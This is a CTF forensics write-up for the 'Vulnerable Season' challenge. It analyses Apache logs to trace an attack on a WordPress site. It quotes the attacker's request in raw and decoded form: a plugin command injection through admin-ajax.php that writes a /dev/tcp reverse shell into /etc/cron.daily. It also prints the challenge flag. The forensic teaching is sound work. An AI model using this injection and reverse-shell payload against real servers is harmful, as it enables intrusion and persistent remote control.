Post

Vulnerable Season

Challenge

  • CTF: Hack The Boo 2023 - Practice Official Writeup
  • Name: Vulnerable Season
  • Category: Forensics
  • Difficulty: Very Easy
  • Points: 300
  • Description: Halloween season is a very busy season for all of us. Especially for web page administrators. Too many Halloween-themed parties to attend, too many plugins to manage. Unfortunately, our admin didn’t update the plugins used by our WordPress site and as a result, we got pwned. Can you help us investigate the incident by analyzing the web server logs?
  • Objective: Webserver Log Analysis

Files

Download: forensics_vulnerable_season.zip

Writeup

The challenge contains a single file called access.log that contains Apache log files from a webserver.

Analyzing the traffic source IP address:

1
2
3
4
5
6
$ cat access.log | awk '{print $1}' | sort | uniq -c | sort -n
     16 ::1
     94 192.168.25.154
    148 68.124.212.176
    456 192.168.25.1
  11020 82.179.92.206

Since most of the traffic is centered around 82.179.92.206, that potentially might be the attackers IP.

Analyzing the user agent of each request:

1
2
3
cat access.log | grep 82.179.92.206 | awk -F\" '{print $6}' | sort | uniq -c | sort -n
     84 Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  10936 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

The attacker used two unique User Agents for the requests. Filtering out on the least amount of user-agent traffic (the other potentially could be from scanning), we find an encoded payload:

1
2
cat access.log | grep 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0'  | tail -n 1
82.179.92.206 - - [28/Sep/2023:05:21:22 -0400] "GET /wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo%20%22sh%20-i%20%3E&%20/dev/tcp/82.179.92.206/7331%200%3E&1%22%20%3E%20/etc/cron.daily/testconnect%20&&%20Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo%20$Mz$Tz$Vz$az$Kz$Oz|base64%20-d|rev:NULL:NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

URL Decoding:

1
/wordpress/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:echo "sh -i >& /dev/tcp/82.179.92.206/7331 0>&1" > /etc/cron.daily/testconnect && Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev

Running the commands:

1
2
Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev
HTB{L0g_@n4ly5t_4_bEg1nN3r}

Flag:

1
HTB{L0g_@n4ly5t_4_bEg1nN3r}
This post is licensed under CC BY 4.0 by the author.